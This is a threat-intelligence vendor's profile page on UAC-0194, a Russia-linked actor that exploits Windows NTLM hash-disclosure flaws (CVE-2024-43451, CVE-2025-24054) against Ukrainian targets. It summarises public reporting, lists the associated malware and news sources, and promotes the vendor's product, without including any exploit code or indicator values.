Skip to main content
Mallory
Back to threat actors
2 malware familiesExploits CVEs in the wild

UAC-0194

Also known asUAC-0194

UAC-0194 is a threat actor cluster assessed in the provided reporting as likely linked to Russia or suspected of having Russian affiliations. The group is associated with cyber operations targeting Ukrainian entities. Reporting links UAC-0194 to in-the-wild weaponization of CVE-2024-43451, a Windows flaw involving malicious Internet Shortcut/.url files that can trigger outbound SMB authentication and expose NTLM/NTLMv2 hashes with minimal user interaction. The activity described includes phishing campaigns themed around renewal of academic certificates, including ZIP archives containing a benign-looking diploma PDF and a malicious URL file, and use of files hosted on an official Ukrainian government site related to academic certificates. CERT-UA technical information cited in the content indicates the exploit was part of a broader campaign aimed at Ukrainian entities. ClearSky assessed the activity as likely linked to UAC-0194 and reported infrastructure tied to a Russian VPS provider. The same exploitation chain was reported as being used to distribute SparkRAT and later Redline Stealer. Additional reporting in the content states that CVE-2024-43451 first emerged in a cyberattack operation launched by UAC-0194 against Ukraine, and that later variant exploitation of related NTLM hash disclosure issues referenced UAC-0194 as a prior actor linked to this tradecraft. No aliases beyond the identical form "uac_0194" are provided in the content.

Share:
Are they targeting you?

Know when an actor pivots toward your sector

Mallory correlates actor tradecraft and target patterns against your stack, your sector, and your geography. See overlap before they land.

Start free trial
ARSENAL

Associated malware families

2 malware families attributed to this actor across reporting.

FamilyContextEvidenceLast seen
RedLineClearSky researchers observed that this vulnerability has been used to distribute various malware, including Redline Stealer and SparkRAT.1Mar 18, 2026
SparkRATThe initial analysis showed that the ZIP files downloaded were installing SparkRAT on some systems, while later variations utilized Redline Stealer.1Mar 18, 2026
WEAPONIZED

Associated vulnerabilities

2 CVEs this actor has used in observed campaigns. 2 of them exploited in the wild.

CVE-2024-43451Windows NTLM Hash Disclosure via Malicious .url FileIn the wildEvidence4

ClearSky Cyber Security has uncovered a new zero-day vulnerability, CVE-2024-43451, actively exploited in the wild, targeting Windows systems primarily in Ukraine. This flaw enables attackers to exploit URL files for malicious activity by performing actions as simple as a single right-click.

CVE-2025-24054Windows NTLM Hash Disclosure Spoofing via .library-msIn the wildEvidence2

A recently patched security flaw affecting Windows NTLM has been exploited by malicious actors to leak NTLM hashes or user passwords and infiltrate systems since March 19, 2025. The flaw, CVE-2025-24054 (CVSS score: 6.5), is a hash disclosure spoofing bug that was fixed by Microsoft last month as part of its Patch Tuesday updates. The security flaw is assessed to be a variant of CVE-2024-43451 (CVSS score: 6.5), which was patched by Microsoft in November 2024 and has also been weaponized in the wild in attacks targeting Ukraine and Colombia by threat actors like UAC-0194 and Blind Eagle.

IOCS

Observables

2 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting. View more in app.

2 IOCsView more in app

IOC values are gated. View more in Mallory for domains, IPs, hashes, and other artifacts, or pipe them straight into your SIEM.

ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app
security boulevardNews
Apr 27, 2025
NSFOCUS APT Monthly Briefing – March 2025

Associated with early use of CVE-2024-43451 in operations against Ukraine (as referenced for provenance of the vulnerability’s observed exploitation).

Read more
the hacker newsNews
Apr 21, 2025
⚡ THN Weekly Recap: iOS Zero-Days, 4Chan Breach, NTLM Exploits, WhatsApp Spyware & More

UAC-0194 is known for exploiting Windows NTLM vulnerabilities, specifically CVE-2025-24054 and its variant CVE-2024-43451, to leak NTLM hashes or user passwords and infiltrate systems. They have targeted Ukraine and Colombia.

Read more
the hacker newsNews
Apr 18, 2025
CVE-2025-24054 Under Active Attack—Steals NTLM Credentials on File Download

Referenced as a threat actor that has weaponized CVE-2024-43451 in real-world attacks, targeting Ukraine and Colombia.

Read more
security online infoNews
Apr 16, 2025
CVE-2025-24054: Actively Exploited NTLM Hash Disclosure Vulnerability

Mentioned as a Russian APT group previously linked to exploitation of CVE-2024-43451 via a .url file; in this reporting, that technique/file is reused alongside CVE-2025-24054 exploitation artifacts.

Read more
+1 more in the timeline
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: sector and geo overlap with your footprint, the IOCs they’re burning right now, detection coverage, and what to do next.
Start free trial
Target overlap

Match sector + geo + tech-stack targeting against your real footprint.

Tradecraft mapping

Every observed MITRE ATT&CK technique, grouped by tactic.

Malware arsenal2

Families this actor is known to deploy, with IOCs and behavior.

Exploited CVEs2

CVEs this actor has used in known campaigns.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

Observables2

Domains, IPs, and hashes tied to this actor, refreshed continuously.